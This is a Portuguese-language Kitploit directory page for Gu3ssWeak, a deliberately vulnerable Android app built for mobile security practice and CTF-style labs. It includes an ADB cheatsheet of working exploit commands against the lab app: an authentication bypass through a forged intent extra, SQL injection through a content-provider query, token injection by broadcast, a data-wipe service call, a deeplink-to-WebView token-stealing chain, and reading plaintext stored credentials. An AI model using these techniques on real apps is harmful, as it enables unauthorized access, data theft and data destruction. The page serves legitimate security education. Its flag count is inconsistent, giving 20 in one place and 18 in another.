Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Gu3ssWeak — Aplicativo Android deliberadamente vulnerável para pesquisa de segurança móvel e prática de bug bounty - OWASP Mobile Top 10 | Kitploit
Ferramentas/GitHubGitHub/b4sith-sec/gu3ssweak
Segurança AndroidAnálise de VulnerabilidadesPentesting de Apps MóveisExploração de Aplicações WebCTFTestes de PenetraçãoSegurança MóvelAprendizado e EducaçãoTrilhas e CursosLabs e Prática
GitHub
8216há 9 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
b4sith-sec/gu3ssweak

Gu3ssWeak

Aplicativo Android deliberadamente vulnerável para pesquisa de segurança móvel e prática de bug bounty - OWASP Mobile Top 10

Ver Repositório

Gu3ssWeak

Um aplicativo Android deliberadamente vulnerável para pesquisa de segurança móvel, prática de bug bounty e aprendizado no estilo CTF. Contém 21 vulnerabilidades documentadas mapeadas para o OWASP Mobile Top 10.


Início Rápido

git clone [email protected]:b4sith-sec/Gu3ssWeak.git
cd Gu3ssWeak
./gradlew assembleDebug
adb install -r app/build/outputs/apk/debug/app-debug.apk

Inicie o aplicativo, percorra cada laboratório, capture as flags e submeta-as no placar CTF do próprio aplicativo.


Categorias de Laboratórios

CategoriaVulnerabilidadesFlags
WebViewWV-01 a WV-055
DeeplinkDL-01 a DL-04, DL-CHAIN5
Auth / SQL InjectionSQL-011
Painel AdminAP-01 a AP-042
ContentProviderCP-011
Broadcast ReceiverBR-01 a BR-032
ServiceSV-01, SV-02a, SV-02b2
Interceptação de RedeNET-011
Banking / OTPOTP-011
LFILFI-011
ArmazenamentoSTORE-011
XSSXSS-01, XSS-022

20 flags no total, além de uma flag master concedida por capturar todas elas.


Capturas de Tela

Lista de LaboratóriosPlacar CTF
lab

Fluxo CTF

  1. Abra o aplicativo - ele vai direto para a lista de laboratórios.
  2. Escolha um laboratório, explore a vulnerabilidade (via UI, ADB ou ambos).
  3. Cada exploit bem-sucedido captura automaticamente sua flag.
  4. Toque em "Submit Flag" para confirmar, ou verifique o progresso em "CTF Scoreboard".
  5. Capture todas as 18 flags para desbloquear a flag master.

Documentação

  • ARCHITECTURE.md - Como cada componente vulnerável funciona internamente
  • MITIGATIONS.md - Orientação de correção e remediação para cada vulnerabilidade, incluindo conceitos de escalação de LFI para RCE
  • SECURITY.md - Política de segurança e divulgação responsável
  • CHECKSUMS.txt - Checksums SHA256 para APKs compilados

Cheatsheet de Exploits via ADB

# Painel admin - exportado, sem permissão
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity

Painel admin - contorne a verificação de autenticação "corrigida" via intent extra forjado

adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity --ez is_authenticated true

Bypass de concessão do ContentProvider - quebra de parênteses escapa da concessão de linha única

adb shell "content query --uri content://com.gu3sswe4k.app.contacts/contacts/1 --where \"1) OR (1=1\""

# Injeção de token via broadcast
adb shell am broadcast -a com.gu3sswe4k.app.SEND_TOKEN --es token FAKE --es user attacker

# Apagamento de dados via serviço exportado
adb shell am startservice -n com.gu3sswe4k.app/.services.DataSyncService --es action wipe_user_data

# Deeplink para cadeia de RCE no WebView
adb shell am start -a android.intent.action.VIEW -d "vulndroid://settings?redirect=com.gu3sswe4k.app.activities.WebViewActivity&url=javascript:VulnBridge.stealToken()"

# Ler credenciais armazenadas em texto simples
adb shell run-as com.gu3sswe4k.app cat /data/data/com.gu3sswe4k.app/shared_prefs/login_prefs.xml

# Monitorar segredos registrados em log
adb logcat | grep Gu3ssWeak

Aviso Legal

Este projeto é puramente educacional. Todas as vulnerabilidades são intencionais e documentadas. As técnicas mostradas aqui se aplicam a aplicativos reais, mas teste apenas sistemas que você possui ou está autorizado a testar. Consulte SECURITY.md para o aviso legal completo e orientação de divulgação responsável.

Licença

MIT - consulte LICENSE.

Baixar ferramenta